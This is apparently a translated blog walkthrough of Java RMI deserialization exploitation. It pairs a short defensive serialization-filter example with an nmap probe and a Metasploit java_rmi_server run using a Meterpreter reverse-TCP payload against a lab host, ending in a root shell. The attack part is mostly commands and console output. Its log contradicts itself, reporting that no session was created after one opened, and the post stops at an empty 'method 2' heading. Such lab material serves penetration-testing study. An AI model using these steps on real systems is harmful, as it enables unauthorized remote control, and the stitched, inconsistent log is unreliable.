Introduction to Java RMI
Java RMI stands for Remote Method Invocation. It is a mechanism that lets an object running in one Java virtual machine call methods on an object running in another Java virtual machine.
RMI is part of J2SE and lets programmers build Java-based distributed applications. An RMI object is a remote Java object whose methods can be invoked from another JVM (even across the network); a remote object's methods are called exactly like those of a local Java object, so objects spread across different JVMs look and behave like local objects.
For any RMI interface that takes an object as a parameter, a client can send an object of its own construction, forcing the server to deserialize it as any serializable class present on the class path.
RMI transport is based entirely on deserialization. Port 1099.
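Because every RMI argument is reconstructed by deserialization, the server-side mitigation is a class allowlist applied before any object is instantiated. The following is an added example (not code from the original post) using the standard JDK ObjectInputFilter (Java 9+, also backported to 8u121+); the package com.example.rmi.** in the filter pattern is a hypothetical placeholder for the application's own argument types.

```java
import java.io.*;
import java.util.ArrayList;

public class RmiSerialFilterDemo {
    // Allowlist in the same pattern syntax accepted by -Djdk.serialFilter:
    // application types and a few JDK value types are allowed, everything else ("!*") is rejected.
    // com.example.rmi.** is a hypothetical package standing in for real RMI argument classes.
    static final ObjectInputFilter FILTER = ObjectInputFilter.Config.createFilter(
        "com.example.rmi.**;java.lang.String;java.lang.Integer;maxdepth=5;!*");

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    // Deserializes with the allowlist applied; a class outside the allowlist is rejected
    // with InvalidClassException before its constructor or readObject logic ever runs.
    static Object deserializeFiltered(byte[] data) throws IOException, ClassNotFoundException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            ois.setObjectInputFilter(FILTER);
            return ois.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        // A legitimate argument type for an RMI method that takes a String is accepted
        System.out.println("accepted: " + deserializeFiltered(serialize("hello")));

        // A class not on the allowlist (a constructed stand-in for an arbitrary classpath class)
        // is rejected; this is the check that blocks the "deserialize as any class" behaviour above
        try {
            deserializeFiltered(serialize(new ArrayList<>()));
            System.out.println("unexpectedly accepted");
        } catch (InvalidClassException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The same pattern string can be applied process-wide with -Djdk.serialFilter=... without code changes, and the RMI registry itself honours a separate sun.rmi.registry.registryFilter property.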
Probing the target RMI service
Use nmap -p 1099 -sV <IP address> to probe the target's version information.
~ nmap -sV -p 1099 10.0.2.5
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-13 09:49 EDT
Nmap scan report for 10.0.2.5
Host is up (0.00034s latency).
PORT STATE SERVICE VERSION
1099/tcp open java-rmi Java RMI Registry
MAC Address: 08:00:27:87:7B:B0 (Oracle VirtualBox virtual NIC)
Service Info: Host: localhost
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.86 seconds
RMI remote command execution, exploitation method 1:
1. Start msfconsole
➜ ~ msfconsole
[-] ***rting the Metasploit Framework console.../
[-] * WARNING: No database support: No database YAML file
[-] ***
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|`.""'.
II 6. .P : .' / | `. :
II 'T;. .;P' '.' / | `.'
II 'T; ;P' `. / | .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v5.0.2-dev ]
+ -- --=[ 1852 exploits - 1046 auxiliary - 325 post ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
+ -- --=[ ** This is Metasploit 5 development branch ** ]
2. Use the exploit/multi/misc/java_rmi_server module
msf5 > use exploit/multi/misc/java_rmi_server
msf5 exploit(multi/misc/java_rmi_server) > set rhosts 10.0.2.5
rhosts => 10.0.2.5
3. Set the payload
msf5 exploit(multi/misc/java_rmi_server) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf5 exploit(multi/misc/java_rmi_server) > set lhost 10.0.2.12
lhost => 10.0.2.12
4. Check the configuration
msf5 exploit(multi/misc/java_rmi_server) > show options
Module options (exploit/multi/misc/java_rmi_server):
Name Current Setting Required Description
---- --------------- -------- -----------
HTTPDELAY 10 yes Time that the HTTP Server will wait for the payload request
RHOSTS 10.0.2.5 yes The target address range or CIDR identifier
RPORT 1099 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload options (java/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.12 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Generic (Java Payload)
5. Run the exploit
msf5 exploit(multi/misc/java_rmi_server) > run
[*] Started reverse TCP handler on 10.0.2.12:4444
[*] 10.0.2.5:1099 - Using URL: http://0.0.0.0:8080/RTcs5fWbAmO91i
[*] 10.0.2.5:1099 - Local IP: http://192.168.1.34:8080/RTcs5fWbAmO91i
[*] 10.0.2.5:1099 - Server started.
[*] 10.0.2.5:1099 - Sending RMI Header...
[*] 10.0.2.5:1099 - Sending RMI Call...
[*] 10.0.2.5:1099 - Replied to request for payload JAR
[*] Sending stage (53845 bytes) to 10.0.2.5
[*] Meterpreter session 1 opened (10.0.2.12:4444 -> 10.0.2.5:35676) at 2019-07-13 09:54:48 -0400
id
[-] 10.0.2.5:1099 - Exploit failed: RuntimeError Timeout HTTPDELAY expired and the HTTP Server didn't get a payload request
[*] 10.0.2.5:1099 - Server stopped.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/misc/java_rmi_server) > sessions -l
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter java/linux root @ metasploitable 10.0.2.12:4444 -> 10.0.2.5:35676 (10.0.2.5)
msf5 exploit(multi/misc/java_rmi_server) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : metasploitable
OS : Linux 2.6.24-16-server (i386)
Meterpreter : java/linux
RMI remote command execution, exploitation method 2
Originally published on the WeChat official account 红云谈安全: Java RMI漏洞利用(1099/1090对外开放-rce) (Java RMI exploitation, ports 1099/1090 exposed, RCE)